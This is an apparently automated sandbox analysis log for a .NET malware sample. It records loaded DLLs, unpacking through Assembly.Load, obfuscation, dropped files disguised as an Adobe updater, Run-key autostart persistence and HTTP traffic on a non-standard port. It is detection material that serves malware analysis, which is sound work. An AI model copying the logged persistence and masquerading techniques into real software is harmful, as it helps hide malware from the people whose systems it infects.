Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 6RE1Z857ae.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 6RE1Z857ae.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004011000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2215324588.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.00000000040B3000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2373598901.0000000002553000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2414867650.0000000003541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.000000000418D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2519401391.0000000003A31000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2464667993.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2540044072.0000000003136000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2627328007.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.000000000290A000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2805070631.00000000038E2000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2898582474.0000000003622000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6RE1Z857ae.exe, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004011000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2215324588.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.00000000040B3000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2373598901.0000000002553000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2414867650.0000000003541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.000000000418D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2519401391.0000000003A31000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2464667993.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2540044072.0000000003136000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2627328007.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.000000000290A000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2805070631.00000000038E2000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2898582474.0000000003622000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 6RE1Z857ae.exe, 00000000.00000002.2215032852.0000000006B10000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 6RE1Z857ae.exe, 00000000.00000002.2215032852.0000000006B10000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: $jq'AwdWWK5AloC28paBhXS.PDbsRn56IGm56L3AWMn source: Plain_Checker.exe, 0000001B.00000002.2540044072.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 6RE1Z857ae.exe, Qqlgbqkozrj.cs .Net Code: Vfxrtacsu System.Reflection.Assembly.Load(byte[])
Source: Adobe_Install_Updater.exe.0.dr, Qqlgbqkozrj.cs .Net Code: Vfxrtacsu System.Reflection.Assembly.Load(byte[])
Source: 0.2.6RE1Z857ae.exe.6b10000.14.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.6RE1Z857ae.exe.6b10000.14.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.6RE1Z857ae.exe.6b10000.14.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.6RE1Z857ae.exe.6b10000.14.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.6RE1Z857ae.exe.6b10000.14.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.6RE1Z857ae.exe.43935e8.9.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.6RE1Z857ae.exe.43935e8.9.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.6RE1Z857ae.exe.43935e8.9.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.6RE1Z857ae.exe.43935e8.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.6RE1Z857ae.exe.43935e8.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.6RE1Z857ae.exe.315edf8.0.raw.unpack, Qqlgbqkozrj.cs .Net Code: Vfxrtacsu System.Reflection.Assembly.Load(byte[])
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.6RE1Z857ae.exe.40b3588.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Yara detected Costura Assembly Loader
Source: Yara match File source: 16.2.InstallUtil.exe.6930000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.6aa0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.Plain_Checker.exe.6d40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.41b8e30.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2373598901.0000000002450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2512990804.0000000006930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2540044072.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2214792226.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2558260556.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2197191438.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2464667993.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2623669408.0000000006D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000036.00000002.2775307801.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2441230781.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Adobe_Install_Updater.exe PID: 1576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Adobe_Install_Updater.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Plain_Checker.exe PID: 3224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Yftssfzf.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Yftssfzf.exe PID: 8060, type: MEMORYSTR
Binary contains a suspicious time stamp
Source: build.exe.0.dr Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_02E106A8 push eax; ret 0_2_02E106B2
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_02E10688 push eax; ret 0_2_02E10692
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_02E10698 push eax; ret 0_2_02E106A2
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_02E1066A push eax; ret 0_2_02E10682
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_02E10621 push eax; ret 0_2_02E10622
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_05F3AE81 push F005FA11h; ret 0_2_05F3AE8D
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_05F36970 push es; ret 0_2_05F36980
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_06A2202A pushad ; ret 0_2_06A2202D
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_06B60660 push es; ret 0_2_06B60670
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_06B6C750 push es; iretd 0_2_06B6C75C
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_06E98222 push 00000062h; retf 0_2_06E98224
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 0_2_06E9914B push ebx; retf 0_2_06E9914D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC30F9 push ss; iretd 7_2_00FC30FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC418B push ds; retf 7_2_00FC4191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC58E8 push eax; ret 7_2_00FC5902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5978 push eax; ret 7_2_00FC5982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5968 push eax; ret 7_2_00FC5972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5958 push eax; ret 7_2_00FC5962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5918 push eax; ret 7_2_00FC5902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5918 push eax; ret 7_2_00FC5912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_00FC5918 push eax; ret 7_2_00FC5952
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_00930698 push eax; ret 12_2_009306A2
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_00930688 push eax; ret 12_2_00930692
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_009306A8 push eax; ret 12_2_009306B2
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_00930618 push eax; ret 12_2_00930692
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_00930618 push eax; ret 12_2_009306A2
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_0093066A push eax; ret 12_2_00930682
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_0093066A push eax; ret 12_2_00930692
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_0527C309 push 1C052E1Fh; iretd 12_2_0527C315
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_05E932A4 push eax; ret 12_2_05E932B1
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 12_2_05EF202A pushad ; ret 12_2_05EF202D
Source: 0.2.6RE1Z857ae.exe.6870000.12.raw.unpack, hbW6SyjmaoI9oASJcgY.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'BPqjg3Ju1X', 'NtProtectVirtualMemory', 'SgVEkvVIGGJ1j61g3Wl', 'nLR1SOVrUJN7ZVH68i1', 'gUBSMjVgP9bcSimeQeV', 'FRGtwDVwap1wRAdZLVt'

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Drops PE files
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File created: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe File created: C:\Users\user\AppData\Roaming\Yftssfzf.exe Jump to dropped file
Source: C:\Users\user\Desktop\6RE1Z857ae.exe File created: C:\Users\user\AppData\Local\Temp\build.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Install_Updater Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Yftssfzf
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Install_Updater Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Install_Updater Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Yftssfzf
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Yftssfzf

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 42128
Source: unknown Network traffic detected: HTTP traffic on port 42128 -> 49877
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\build.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
